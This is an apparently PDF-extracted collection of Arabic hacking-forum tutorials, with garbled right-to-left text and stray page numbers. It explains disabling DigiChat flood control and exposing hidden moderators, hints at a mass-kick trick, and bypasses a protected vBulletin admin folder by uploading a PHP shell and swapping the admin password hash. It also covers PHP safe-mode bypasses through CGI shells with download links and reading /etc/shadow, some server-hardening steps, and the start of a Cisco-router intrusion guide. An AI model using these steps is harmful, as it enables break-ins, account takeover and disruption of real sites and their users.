على شرح كتبتة سابقا وسأشرح فقط على المواقع التى تضع حماية‬ ‫على دردشتة‪ ‬‬ ‫مثل سكريبت اللغة الذي به العديد من المزايا‪ ‬‬ ‫اول سنبدأ بالطرد التلقائي في اغلب الدردشة التى تضع السكريبت خارج‪ ‬‬ ‫الدردشة‪ ‬‬ ‫اذن كیف لي ان اعمل فلود وليتم طردي او اخفاء ماكتبتة من فلود ؟؟؟‪ ‬‬ ‫كل ماعلیك فعله ھو التوجه الى صفحة الديجي شات اغلبھا تكون بالصفحة‪ ‬‬ ‫الرئیسیه تبع الموقع‪ ‬‬ ‫قم بعرض المصدر تبع الصفحة الخاصه بالموقع مثل‪ ‬‬ ‫ابحث عن ھذا السطر‪ ‬‬ ‫‪ >"0052"=<PARAM NAME="floodControl" VALUE‬‬ ‫ليھم ان يكون ‪ 0052‬ولكن اھم شئ ھو ‪ FloodControl‬‬ ‫بعد ماتحصل على السطر قم بحذفه‪ ‬‬ ‫ملحظة لتكون غبي وتحفظ كود المصدر‪ ‬‬ ‫وتابع معى الشرح‪ ‬‬ ‫الن تخطینا اول عائق وھو الطرد التلقائي‪ ‬‬ ‫ماذا بقى لنا‪ ‬‬ ‫قم بأضافه ھ ذا السطر بدل السطر الذي حذفته قبل لحظات‪ ‬‬ ‫‪ 543‬‬ ‫‪ >'<PARAM NAME='BuddiesTab' value='True‬‬ ‫انسخ الكود واذھ ب الى اي محرر اكواد ‪ html‬اسھل شئ ومتوفر في انظمة‪ ‬‬ ‫ويندوز اذا كنت تستخدمھا ھو‪ ‬‬ ‫الفرونت بیج‪ ‬‬ ‫وانسخ الكود كله تبع الموقع ومعه اضافتك للكود بعد ماحذفت كود الفلود‪ ‬‬ ‫الن تخطینا الفلود ونستطیع عمل فلود بالديجي شات وبدون مايتم طردنا وكأننا‬ ‫مستخدمین خاصین‪ ‬‬ ‫اما بقیه الزوار سینبھرون من ھ ذه الطريقه التى ليستطیعون عملھا بسبب‪ ‬‬ ‫الطرد التلقائي الموجود بصفحة الموقع‪ ‬‬ ‫وعلى كل زائر التقید بعدم الفلود ول تم طرده ولكن من يتبع انجازات سوبر‪ ‬‬ ‫كريستال لعلیه‪ ‬‬ ‫ال ان يعمل مايشاء‪ ‬‬ ‫اذن ماھو الكود الثاني الذي اضفناه؟‪ ‬‬ ‫ھو كود لستخراج قائمة الصدقاء وكشف المراقب المخفي‪ ‬‬ ‫ولكن لحظ الكود تبع قائمة الصدقاء‪ ‬‬


‫‪ >'<PARAM NAME='BuddiesTab' value='True‬‬ ‫ضعه ھ كذا واذا لم ينجح ضعه ھكذا‪ ‬‬ ‫‪ >'<PARAM NAME='BuddiesTab' value='FALSE‬‬ ‫والن مبروك علیك تخطیت عائقین بالديجي شات‪ ‬‬ ‫‪ 643‬‬ ‫ولكن يوجد مشكلة آخرى ؟؟‪ ‬‬ ‫ھي عدم الدخول بأسم يحمل لفظ الجللة وھذا ماشرحته بدرسي السابق‬ ‫قبل سنتین تقريبا ولكن سأعید شرحه ھنا‪ ‬‬ ‫قم بفتح المصدر بعد التعديل علیه‪ ‬‬ ‫والبحث عن ھذا السطر‪ ‬‬ ‫البداية‪ ‬‬ ‫‪ ;str=loginname‬‬ ‫وقم بمسحة الى ان تصل الى‪ ‬‬ ‫‪ ;var drawmenu‬‬ ‫ض قم بمسحة‪ ‬‬ ‫واي َ‬ ‫ا‪ ‬‬ ‫والن مبروك علیك تخطیت ثلث خطوات‪ ‬‬ ‫وھي الطرد التلقائي‪ ‬‬ ‫اضافه قائمة اصدقاء لكشف السوبر المخفي‪ ‬‬ ‫مسح سكريبت منع دخول اسم يحمل لفظ جللة‪ ‬‬ ‫‪ 743‬‬ ‫طیب بقى لنا كم من خطوة ولكن لن أشرحھا ھنا‪ ‬‬ ‫ابحث بنفسك عن كود ‪ Bannd‬بالنترنت وقم بضافتة تحت كود قائمة الصدقاء‪ ‬‬ ‫كي تدخل ومعك صلحیة طرد الزوار والمراقبین‪ ‬‬ ‫ويوجد طريقه قمت ايضا بكشفھا وھ ي كیف تدخل وتمنع اي شخص ان يقوم‪ ‬‬ ‫بحضرك‪ ‬‬ ‫ولكن لن اشرحھا لنني اعتبرھا من الطرق الفضولیة على الزوار‪ ‬‬ ‫اذن الن انتھ ینا تقريبا من بعض طرق تخطى سكريبتات الحماية التى يدعونھا‪ ‬‬ ‫خبراء آمن الديجي شات‪ ‬‬ ‫ولم يتقبى من درسنا ال خطوة واحده‪ ‬‬ ‫وھ ي لماذا اراجع درسك ياسوبر كل مااريد ان ادخل دردشة اخرى واتبع‪ ‬‬ ‫الخطوات والتعب‪ ‬‬ ‫يوجد طريقة تريحك من التعب اذا اردت ان تطبق جمیع الطرق على أي دردشة‬ ‫ديجي شات تريد‪ ‬‬ ‫طبعا بعد ماقمنا بالتعديل نحفظ الصفحة بالجھاز‪ ‬‬ ‫وكل مره نريد ندخل الشات المحدد ندخل عن طريق ھذا الصفحة‪ ‬‬ ‫ولكن اذا اردنا الدخول لشات آخر كل ماعلینا‪ ‬‬ ‫ھو فتح سورس الصفحة‪ ‬‬ ‫‪ 843‬‬ ‫والبحث عن‪ ‬‬ ‫‪ +""<APPLET CODEBASE=http://127.0.0.1/DigiChat/DigiClasses/"+"\n‬‬ ‫بعد ذالك نذھب لديجي شات الذي نريد ازعاجة ھذه المره‪ ‬‬ ‫ونفتح ايضاء سورس الديجي شات نفسه ولیس سورس صفحتك التى عملتھا‪ ‬‬ ‫ونبحث عن نفس السطر وبعد ذالك نأخذ رقم الي بي‪ ‬‬ ‫ونذھب لصفحتنا ونضعھ ا بدل رقم الي بي تبع الدردشة القديمة‪ ‬‬ ‫وانتھت‪ ‬‬ ‫وانصحك ان تعمل كالسوبر كريستال في السابق‪ ‬‬ ‫مبرمج لي صفحة ‪ html‬اجرامیة وبھا كل مااريد‪ ‬‬ ‫وكل مااريد الدخول لشات فقط اغیر رقم الي بي‪ ‬‬ ‫طبعا احذف الصور الموجودة بسورس الصفحة كي لتثقل علیك وانت تعمل فلود‬


‫­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­‪ ‬‬ ‫=___________________________________________‪ = ‬‬ ‫­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­‪ ‬‬ ‫يوجد طريقة اخرى وھي الـطـرد الجماعي للزوار‪ ‬‬ ‫‪ 943‬‬ ‫ولكن لن اشرحھ ا لما تسببه من اضرار جسیمة للديجي شات‪ ‬‬ ‫ولكن سأعطیك زبدة الموضوع‪ ‬‬ ‫قم بتشفیر حرف ‪ r‬وتأكد انه صمول ولیس كبتل ‪ R‬‬ ‫قم بتشفیره بمقیاس (( *** )) ثلث نجمات فقط لتزيد ولتنقص‪ ‬‬ ‫واذھب للديجي شات وضع حرف الـ ‪ r‬سترى انك تنطرد انت وجمیع الزوار‪ ‬‬ ‫والمراقبین بمجرد‪ ‬‬ ‫وضعه بالديجي شات‪ ‬‬ ‫ستقول لي كیف اشفره ؟‪ ‬‬ ‫الجواب عندك استعن بخبراتك بالجافا سكريبت وحاول‪ ‬‬ ‫وبعد ماتشفره‪ ‬‬ ‫ضعه بالسطر الثالث من‪ ‬‬ ‫‪ +">'"<META NAME='Audience' CONTENT='All‬‬ ‫بعد السطر ھذا او بعد سطرين من ھذا السطر‪ ‬‬ ‫واحفظه وادخل الشات وسترى كیف تلعب به‪ ‬‬ ‫­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­‪ ‬‬ ‫يوجد طريقة جمیلة جدا ومضحكة بنفس الوقت ھي لیست اختراق وفلود‬ ‫وعمل زحمة‪ ‬‬ ‫‪ 053‬‬ ‫ولكن اضافة جديدة تمیز نفسك‪ ‬‬ ‫مثل كیف ادخل شات واسمي بالعبريه مثل او بالصینیة ھھھھھھھه‪ ‬‬ ‫اشھد بعد ماتدخل تحصل العالم خاص عندك والغلبیه من النوع الثاني‪ ‬‬ ‫كنت اسويھا ايام مراھقتي بالديجي شات لوول‪ ‬‬ ‫اضیف اختصار اللغة الى تبیھا في ھذا السطر‪ ‬‬ ‫‪ +">'"<META NAME='Language' CONTENT='EN/AR‬‬ ‫طبعا ھ ذا فقط اذا اردت ان تدخل ويكون اسمك مختلف عنھم بلغة عجیبه‬ ‫وغريبه‪ ‬‬ ‫غیر اختصار اللغه بدل ‪ EN/AR‬وھو عربي اجنبي خلیه عربي عبري لوول‪ ‬‬ ‫واذا تبي تكتب عندھم بالشات بطلسم واشیاء مايقدروا ان يكتبوا زيھا‪ ‬‬ ‫نضیف ھذا السطر‪ ‬‬ ‫‪+">'"<META HTTP­EQUIV='Content­Language' CONTENT='ar­eg‬‬ ‫نغیر ايضاء اختصار عربي وصیني او لتیني ‪......‬الخ‪ ‬‬ ‫طبعا كي ليكون شرحي به كثیر من التساؤلت‪ ‬‬ ‫سأوضح اين تضع ھذا الكواد‪ ‬‬ ‫نفتح السورس الذي اضفنا علیه سابقا‪ ‬‬ ‫‪ 153‬‬ ‫ونبحث عن‪ ‬‬ ‫‪ +">drawmenu="<head‬‬ ‫نضیف تحته مباشره سطر لغة السم وھو‪ ‬‬ ‫‪ +">'"<META NAME='Language' CONTENT='EN/AR‬‬ ‫واذا اردنا إن نضیف كود الكتابة بوسط الديجي شات‪ ‬‬ ‫نبحث عن ھذا الكود‪ ‬‬ ‫‪ ;"<META HTTP­EQUIV='Content­Type' CONTENT='text/html‬‬ ‫‪ +">'6521­charset=windows‬‬ ‫نضیف تحته مباشر كود الكتابة باللغة التى تريد‪ ‬‬ ‫‪+">'"<META HTTP­EQUIV='Content­Language' CONTENT='ar­eg‬‬


‫طبعا فیه اكتشاف لي وخطیر جدا ببرنامج الديجي شات‪ ‬‬ ‫ولكن لن اوضح منه حتى لو جزء بسیط حتى ليتم كشف الباقي‪ ‬‬ ‫ولكن فقط اود ان اذكره‪ ‬‬ ‫ھو اننى اسطعت ان اضیف اسطر في السكريبت الكامل للديجي شات‪ ‬‬ ‫‪ 253‬‬ ‫وبدل مايتم الكتابة بالديجي شات بـ ‪text‬بل انشأت لي ملف وقمت بتعديل‪ ‬‬ ‫الكود‪ ‬‬ ‫الى ان سمح لي بــ؟؟؟؟؟‪ ‬‬ ‫امتداد لتتوقعونه‪ ‬‬ ‫‪ !!!!!!!!!!!!!!!!! exe‬‬ ‫شئ ليصدق فعل وھذا ماسبب خطورة ‪ %001‬على زوار الديجي شات‪ ‬‬ ‫ولكن اظن لن تخفي علي اي عبقري وسیكشفھا مھما‪ ...‬‬ ‫طبعا برنامج ‪ MG Chat‬الديجي شات كالطفل بأبتسامتة البرئیة التى تملئ‪ ‬‬ ‫وجه لم يقوم بحماية برنامجھم‪ ‬‬ ‫ولكن السبب لماذا لم يقوموا بحماية برنامجھم ھو انھم لم يواجھو اي مشاكل‬ ‫حول ھذه الطرق‪ ‬‬ ‫وسأقوم بمراسلتھم حول ھذه الغلطات الفادحة ببرنامجھم الي يفتقر الحماية‬ ‫حتى وبنسبة ‪ % 02‬‬ ‫ولكن بعد مااقوم بتوزيع نسخه ‪ MG Security‬التى لم اضیف على البرنامج ال‪ ‬‬ ‫سكريبتات بسیطة وقويه‪ ‬‬ ‫وفعالة بنفس الوقت تمنع جمیع المخاطر بأقل السعار‪ ‬‬ ‫لننى اعلم ان شركة الم ستقوم بترقیع ھ ذا الخطاء وترفع سعر النسخه‪ ‬‬ ‫الجديده مما سیكون العائق ارتفاع سعره‪ ‬‬ ‫‪ 353‬‬ ‫شرح تخطي مجلد الحمايه للدمن‪ ‬‬ ‫للكاتب‪ Qptan :‬‬ ‫­­­­­­­­­­­­­­­­­­‪ ‬‬ ‫نبذه عن مجلد الحمايه‪ :‬‬ ‫ھو مجلد حمايه يوضع على مجلد الدمن ‪ admincp‬فـ غالبا ً تجده يعیق‪ ‬‬ ‫السكربت كیدز عن الختراق للمنتدى‪ ‬‬ ‫­­­­­­­­­­­­­­­­­­‪ ‬‬ ‫­­­­­­­­­­­­­­­­­­‪ ‬‬ ‫في موضوعنا ھذا سوف أشرح لكم الطريقه رقم ‪ 1‬من الطرق الثلث لتخطي‬ ‫مجلد الحمايه الكسس ھتاكسز ‪ htaccess‬‬ ‫­­­­­­­­­­­­­­­­­­‪ ‬‬ ‫­­­­­­­­­­­­­­­­­­‪ ‬‬ ‫سوف اشرح لكم الطريقه وھي تكون عبر ثغرات‪ command exection‬‬ ‫ولقد تم شرح ثغره ‪ command exection‬لمنتديات ‪3 vb‬من قبل شبح اللیل‪ ‬‬ ‫­­­­­­­­­­­­­­­­­­‪ ‬‬ ‫­­­­­­­­­­­­­­­­­­‪ ‬‬ ‫الطريقه‪ :‬‬ ‫أول ارفع ‪ phpshell‬على المنتدى ( تم شرح ھذه الطريقه ضمن موضوع شبح‬ ‫اللیل)‪ ‬‬ ‫الن اذھب الى المجلد الرئیسي للموقع ھكذا‪ cd public_html‬‬ ‫الن اكتب المر‪ ls‬‬ ‫سوف يظھر لك ملفات الموقع ومن ضمنھا مجلد الكسس‪ htaccess‬‬ ‫الن ادخل الیه ھكذا‪ cd htaccess‬‬ ‫الن اضغط‪ ls‬‬ ‫بیطلع لك‪ vb‬‬ ‫ادخل الیه ھكذا‪ cd vb‬‬


‫الن اضغط‪ ls‬‬ ‫تجد الملفات المحمیه في مجلد المنتدى ومن ضمنھم‪ admincp‬‬ ‫‪ 453‬‬ ‫الن اكتب المر‪ edit admincp‬‬ ‫المر للتعديل مجلد الدمن كنترول للتحكم بلمنتدى‪ ‬‬ ‫ملحظه ھ امه ‪ :‬يجب ان تستعمل الشیل‪ MyShell‬‬ ‫المھم‪ ‬‬ ‫سوف يظھر لك الیوزر والباسورد طبعا الباسورد مشفر بمقیاس‪ des‬‬ ‫يظھر ھكذا‪ :‬‬ ‫‪ admin:Passwrd DES‬‬ ‫الن أمامك خیاران ‪ :‬إما انك تفك الشفره أو انك تغیر الباسورد المشفر الى‪ ‬‬ ‫باسورد مشفر آخر انت تعرفه ماقبل التشفیر ‪ ,‬انت بكیفك الحین‪ ‬‬ ‫بعد كذا اضغط على ‪ Save‬للحفظ‪ ‬‬ ‫الن اذھب الى مجلد المنتدى ھكذا ‪ www.XXX.com/vb/admincp :‬‬ ‫ادخل الباسورد والیوزر الي فكیتھم او بدلتھ م بباسورد اخر تعرفه ماقبل التشفیر‬ ‫مبروك لقد تخطینا الن مجلد الحمايه!!‪ ‬‬ ‫‪ 553‬‬ ‫السیف مود ما ھو وكیفیفة تخطیه وكیفیة تفعیله على‪ ‬‬ ‫السیرفر‪ ‬‬ ‫للكاتب‪ hi_hacker:‬‬ ‫أول ابرئ ذمتي من اي استخدام خاطئ لھذا الموضوع‪ ‬‬ ‫ثانیا الموضوع سیكیورتي اكثر من انه موضوع تعلیم اختراق لن الموضوعین‪ ‬‬ ‫متلزمین ول يمكن تطبیق احدھ ما بدون الخر فحتى اشرح الحماية لبد ان‪ ‬‬ ‫اشرح الختراق و توضیح الخطر حتى يكتمل الموضوع‪ .‬‬ ‫ماذا نعني بكلمة الحالة المنة أو الـ‪ safe ­ mode...‬‬ ‫ھي عبارة عن منع اسكربتات الـ ‪ php‬من استدعاء دوال النظام بمعنى آخر ھو‪ ‬‬ ‫حجب لبعض الدوال الخطرة مثل الدالة ( ) ‪ sytem‬و ‪....‬و ‪ shell_exec‬و )‪popen‬‬ ‫(و ( )‪ exec‬و( ) ‪ Pass thru‬‬ ‫فمثل حتى تستخدم المر ‪ cat‬يجب أن تكون دالة الـ ()‪ system‬مفعلة حتى‪ ‬‬ ‫تستطیع تطبیق المر بشكل صحیح ومن غیرھ ا لن تجد أي استجابة من السیر‬ ‫فر‪ ...‬‬ ‫كیف نعرف اذا كنا نستخدم الـ ‪ phpshell‬ان السیرفر سیف مود ؟؟‪ ‬‬ ‫نعرف اذا طبقنا اي امر ولم يكن ھنالك اي استجابة لھ ذا المر من السیرفر ل‪ ‬‬ ‫رسالة خطأ في اسم او مكان الملف ‪ No such File or dirctory‬ول رسالة خطأ‬ ‫في الصلحیات‪ permmission denied ....‬‬ ‫اما اذا كان الناتج بعد تطبیق المر الرسالة ھذي ‪ No such file or dirctory‬‬ ‫فاعرف مسار الملف الي كتبته غیر صحیح وابحث عن مسار اخر للملف او‪ ‬‬ ‫المجلد واستخدم المر ‪ find‬لمعرفة المسار للملف الذي تبحث عنه‪ ...‬‬ ‫وأما اذا كانت رسالة الخطأ في الصلحیات ‪ permmission denaied‬فاعرف بأنه‪ ‬‬ ‫لیس لديك الصلحیات في المر الذي كتبته مثل‪ ‬‬ ‫‪cat /etc/shadow‬مباشرة سیعطیك رسالة لیس لديك الصلحیة‪ ...‬‬ ‫*طريقة تفعیل السیف مود على السیر فر‪ :-‬‬ ‫سأذكر أشھ ر طريقتین لتفعیل السیف مود وتوجد طريقة ثالثة لن اتطرق لھا‪ ...‬‬ ‫‪-1‬الطريقة الولى ‪ -:‬استعراض ملف ‪ php. ini‬وسنجد أن حالة السیف مود غیر‬ ‫مفعلة مسبقً ‪ safe_mode = off‬‬ ‫ا‪ ‬‬ ‫(‪2‬ولتفعیلھا فما علینا إل وضع التالي‪ :-‬‬ ‫‪ 653‬‬ ‫‪ Safe – mode = on‬‬ ‫ثم نقوم بعمل ريستارت للباتشي بالمر‪ ‬‬


‫‪ httpd restart‬‬ ‫‪-2‬الطريقة الثانیة ‪ - :‬طريقة حجب الدوال يدويً وذلك من خلل الخاصیة‪ ‬‬ ‫ا‪ ‬‬ ‫الموجودة في الملف ‪ .... php.ini‬‬ ‫ثم بعد استعراض الملف بامر‪ pico‬‬ ‫‪ Pico /usr/local/lib/php.ini‬‬ ‫نبحث عن‪ = disable_function‬‬ ‫ونضع الدوال التي نريد حجبھا بعد علمة المساواة بھذه الطريقة‪ ....‬‬ ‫‪ Disable_function = system; passthru; exec ; popen , shell–exec‬‬ ‫ثم نقوم بعمل ريستارت للباتشي بالمر‪ ‬‬ ‫‪ httpd restart‬‬ ‫طرق تخطي السیف مود‪ :-‬‬ ‫الجمیع يعلم أن السیف مود تطبق فقط على سكربتات ودوال ‪ php‬فقط بمعنى‬ ‫أن بإمكاننا استخدام دوال وسكربتات للملفات الخرى يمكننا من خللھا‪ ‬‬ ‫استدعاء دوال النظام والستفادة منھا ومن أشھرھا – ‪ pythone‬و‪ perl ....‬‬ ‫(‪1‬استخدام سكربتات بیرل و ‪ cgi‬‬ ‫وسأذكر ھ نا أخطر السكربتات المعروفة والتي تؤدي نفس عمل سكربتات الـ‪ ‬‬ ‫‪php‬بل وبشكل أرقى ومن أشھ ر السكربتات المستخدمة اسكر بت ‪cgitelnet‬‬ ‫‪ ....‬‬ ‫واسكربت‪ cgicommander ...‬الخ‪ ‬‬ ‫لتحمیل الـ ‪ http://corruptcode.org/downloads/cgitelnet.zip cgitelnet‬‬ ‫لتحمیل الـ ‪ cgicommand‬‬ ‫‪ http://corruptcode.org/downloads/cgicommand.zip‬‬ ‫ھذه المشھورة ويوجد افضل منھا بكثیر مثل‪ Homo Commander‬‬ ‫والیكم بعض الساسیات لكي تعمل ھذه السكربتات بشكل صحیح‪ ‬‬ ‫أول يجب أن يدعم السیرفر السي جي أي أو البیرل‪ ‬‬ ‫طبعا في بداية السكربت يجب تحديد مسار البیرل كي يعمل السكربت بشكل‬ ‫صحیح وھذان ھ ما المساران الفتراضیان للبیرل اما‪ ‬‬ ‫‪/usr/bin/perl‬او‪ ‬‬ ‫‪ /usr/local/bin/perl‬‬ ‫واحیانا تعمل سكربتات البیرل على جمیع مجلدات السیرفر اقصد ‪ public_html‬‬ ‫‪ 753‬‬ ‫واحیانا ل تعمل ال داخل مجلد السي جي اي بن لذلك ضح املف داخل مجلد‬ ‫السي جي اي ‪ .. cgi­bin‬‬ ‫ثانیا ‪ /‬ان كان النظام لینكس فل نعدل شئ في ;‪ $WinNT = 0‬‬ ‫أما إن كان ويندوز ‪ NT‬او احد مشتقاته كويندوز ‪ 0002‬فنستبدل الصفر بواحد‪ ‬‬ ‫بحیث يكون‪ ‬‬ ‫‪ = $1WinNT‬‬ ‫ثالثا ‪ /‬نضع باسوورد على السكربت من;"**********" = ‪ Password‬‬ ‫بدل النجم نضع كلمة الباسورد والكلمة الفتراضیة ‪ changeme‬‬ ‫الطريقة الثانیة لتخطي السیف مود‪ ‬‬ ‫عند اختراق أي موقع وكان السیرفر سیف مود فاننا نحاول استخدام الشل او‬ ‫التلنت ان كان مفعل للموقع وقد عرفنا كیفیة التصال بالشل ‪ ssh‬عن طريق‪ ‬‬ ‫المنفذ ‪ 22‬والتلنت عن طريق المنفذ ‪ 32‬وذكرنا امثلة على برامج التصال في‪ ‬‬ ‫الدرس الثاني‪ ‬‬ ‫الطريقة الثالثة لتخطي السیف مود‪ ‬‬ ‫وتفید كثیرا في اختراق المنتديات الموجودة على السیرفر وھي استخدام‪ ‬‬ ‫سكربتات مثل ‪ phpmyadmin‬ويكون موجود مع نسخة سیرفر الباتشي او‪ ‬‬ ‫‪sql.php‬او ‪ mysql.php‬ويوجد سكربتات كثیرة للتحكم بالداتا بیس على‪ ‬‬ ‫السیرفر حتى مع تفعیل السیف مود‪ ‬‬


‫ولتعطیل البیرل والسي جي اي من السیرفر اما يتوقیفھا نھائیا‪ ‬‬ ‫‪ Chmod 744 /usr/bin/perl‬‬ ‫‪ Chmod 744 /usr/local/bin/perl‬‬ ‫والحل الفضل بتوقیف السي جي اي للمواقع من الباتشي ‪ httpd.conf‬‬ ‫وتجده على المسار‪ /usr/local/apache/conf /‬‬ ‫واذھب الى ھذا السطر‪ ‬‬ ‫‪ /ScriptAlias /cgi­bin/ /home/XXXXXX/public_html/cgi­bin‬‬ ‫احذف ‪ Home‬واحفظ التعديلت‪ ‬‬ ‫‪ ctrl + x‬‬ ‫‪ y‬‬ ‫انتھى‪ ‬‬ ‫وھ ذا الحل افضل برايي‪ ‬‬ ‫‪ 853‬‬ ‫ول تنسى تفعیل ‪ SuExec‬على السیرفر‪ ...‬‬ ‫لكي يمنع تشغیل الوامر لي سكربت في وضع‪nobody‬‬ ‫‪ 953‬‬ ‫‪ Exploiting Cisco Systems‬‬ ‫للكاتب ‪ Dr^FunnY :‬‬ ‫تكلمت في موضوع سابق بعنوان ‪ Hacking Networks Routers‬عن الراوترات‪ ‬‬ ‫واھمیتھا في الشبكات ووظیفتھ ا على النترنت ومقدمة بسیطة للتعامل معھا ‪.‬‬ ‫والیوم سنقوم بالتوغل اكثر وبتفصیل اكبر في احد ھ ذه النواع من الراوترات وھو‬ ‫اكثرھا شھرة على النترنت واكثرھا استخداما وھي من نوع‪ Cisco Routers‬‬ ‫فتح عینك وشغل راسك واقعد كويس علشان ھانروح رحلة الى عالم ‪ Cisco‬‬ ‫‪Systems ...‬ومتنساش تربط الحزام‪ ‬‬ ‫تحذير ‪ :‬ل تقوم باستغلل ھذه المعلومات في تخريب ‪ cisco systems ,‬ھذا‪ ‬‬ ‫الموضوع لغرض تعلیمي فقط ‪ ,‬فقط استعمل المعلومات في الطريق السلیم ‪ .‬‬ ‫ويجب ان تعلم انه بتخريبك لراوترات سیسكو او حتى مجرد تعطیلھا يمكنه ان‪ ‬‬ ‫يتسبب في مشاكل لمئات من مستخدمین النترنت وخسائر بالف الدولرات‪ ‬‬ ‫مما يوقعك في مشاكل انت في غنى عنھا‪ ‬‬ ‫­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­‪ ‬‬ ‫المحتويات‪ :‬‬ ‫­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­‪ ‬‬ ‫في البداية وقبل ان نبدء‪ :‬‬ ‫ما ھو عنوان‪ IP‬‬‫ما ھو الـ‪ ISP‬‬‫ماذا تعني ‪ TCP/IP packet‬‬‫كیف اقوم بعمل ‪ spoof‬للـ‪ IP‬‬‫كیف اقوم باستخدام ‪ Telnet‬‬‫كیف استخدم ‪ HyperTerminal‬‬‫كیف استفید من ‪ Ping‬‬‫‪ 063‬‬ ‫كیف استخدم ‪ TraceRoute‬‬‫كیف استعمل ‪ proxy server‬‬‫­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­‪ ‬‬ ‫الفصل الول ‪ :‬لماذا اقوم بأختراق‪ cisco router‬‬‫الفصل الثاني ‪ :‬كیف اعثر على‪ cisco router‬‬‫الفصل الثالث ‪ :‬كیف اقوم بكسر ‪ cisco router‬والدخول الیه‪ ‬‬‫الفصل الرابع ‪ :‬كیف اقوم بكسر الباسوردات لـ‪ cisco router‬‬‫­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­‪ ‬‬ ‫اساسیات يجب علیك معرفتھا قبل البداية‪ :‬‬


‫­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­‪ ‬‬ ‫ما ھو عنوان‪ IP :‬‬‫‪IP‬ھو اختصار لـ ‪ Internet Protocol ,‬وكل جھ از او سیرفر على شبكة النترنت‪ ‬‬ ‫يمتلك اي بي اما يكون ثابت او دينامیكي اي متغیر ‪ ,‬ول يمكن بأي حال من‪ ‬‬ ‫الحوال ان يتشابه رقمان ‪ IP ,‬واجھزة الكمبیوتر تتعرف على بعضھا عن طريق‪ ‬‬ ‫ارقام ‪ IP‬الخاصة بھا كما يتعرف البشر على بعضھم عن طريق اسمائھم ‪ .‬‬ ‫ويسھ ل الحصول على ارقام الي بي الخاصة بك عن طريق الكثیر من الطرق‪ ‬‬ ‫والدوات ‪ ,,,,‬فیمكن مثل‪ :‬‬ ‫تدخل على احد المواقع فیقوم الموقع بتخزين الي بي الخاص بك في ملفات‬‫الـ‪ log‬‬ ‫يستطیع اي احد الحصول على الي بي الخاص بك عن طريق الـ ‪ IRC‬‬‫وكذلك على ‪ ICQ‬يستطیع اي احد الحصول على الي بي الخاص بك حتى لو‬‫كنت قد اختارت خاصیة "‪ "do not show ip‬فبأمكانھم ايضا الحصول علیه‪ ‬‬ ‫اذا قمت بالتصال بأي شخص على النترنت فبأمكانه كتابة "‪ "systat‬ورؤية‪ ‬‬‫رقم اي بي المتصل معه‪ ‬‬ ‫‪ 163‬‬ ‫ممكن يا حد يبعتلك ايمیل يحتوي على‪ IP­logging java ‬وبكده يقدر يحصل‪ ‬‬‫على الي بي الخاص بك‪ ‬‬ ‫وتوجد طرق اخرى كثیرة للحصول على رقم‪ IP ‬الخاص بك ومن ضمنھا برامج‪ ‬‬ ‫التروجن مثل‪ Sub7 ‬او‪ NetBus.‬‬ ‫­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­‪ ‬‬ ‫ما ھو الـ‪ ISP :‬‬‫‪ISP‬ھو اختصار لجملة‪ Internet Service Provider ‬وھو ده اللي بیوصلك‪ ‬‬ ‫النترنت او اللي انت بتدخل على النترنت عن طريقه بواسطة‪ dial­up ,,, ‬‬ ‫وبأمكان الخرين ان يعرفو الـ‪ ISP ‬بتاعك عن طريق عمل‪ traceroute ‬على الي‬ ‫بي بتاعك ‪ ..‬حیث ستخرج نتائج مشابھة للنتیجة التالیة‪ :‬‬ ‫‪ tracert 222.222.22.22‬‬ ‫]‪ Tracing route to [221.223.24.54‬‬ ‫‪ over a maximum of 30 hops.‬‬ ‫]‪ 1 147ms 122ms 132ms your.isp [222.222.22.21‬‬ ‫]‪ 2 122ms 143ms 123ms isp.firewall [222.222.22.20‬‬ ‫]‪ 3 156ms 142MS 122ms aol.com [207.22.44.33‬‬ ‫‪ 4 * * * Request timed out‬‬ ‫]‪ 5 101ms 102ms 133ms cisco.router [194.33.44.33‬‬ ‫]‪ 6 233ms 143ms 102ms something.ip [111.11.11.11‬‬ ‫]‪ 7 222ms 123ms 213ms netcom.com [122.11.21.21‬‬ ‫]‪ 8 152ms 211ms 212ms blahblah.tts.net [121.21.21.33‬‬ ‫‪9 122ms 223ms 243ms altavista.34.com [121.22.32.43] <<< target's‬‬ ‫‪ isp‬‬ ‫‪ 10 101ms 122ms 132ms 221.223.24.54.altavista.34.com‬‬ ‫]‪ [221.223.24.54‬‬ ‫‪ Trace complete.‬‬ ‫­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­‪ ‬‬ ‫‪ 362‬‬ ‫ماذا تعني‪ TCP/IP packet :‬‬‫‪TCP/IP‬ھو اختصار لـ ‪ Transmission Control Protocol‬و ‪Internet Protocol ..‬‬ ‫والـ ‪ TCP/IP packet‬عبارة عن حزمة من المعلومات المضغوطة ‪ ,‬والحزمة دي‪ ‬‬ ‫بتحتوي على حاجة اسمھا ‪ header ,‬والھیدر ده ھو اللي بیحدد وجھة الحزمة‪ ‬‬ ‫في طريقھا للجھزة الخرى على الشبكة ‪ ,‬وھو ده تفسیر انتقال البیانات عبر‪ ‬‬ ‫النترنت ‪ ,‬وضروري نعرف ان الـ ‪ header‬في حزم الداتا بیحتوي على اي بي‪ ‬‬


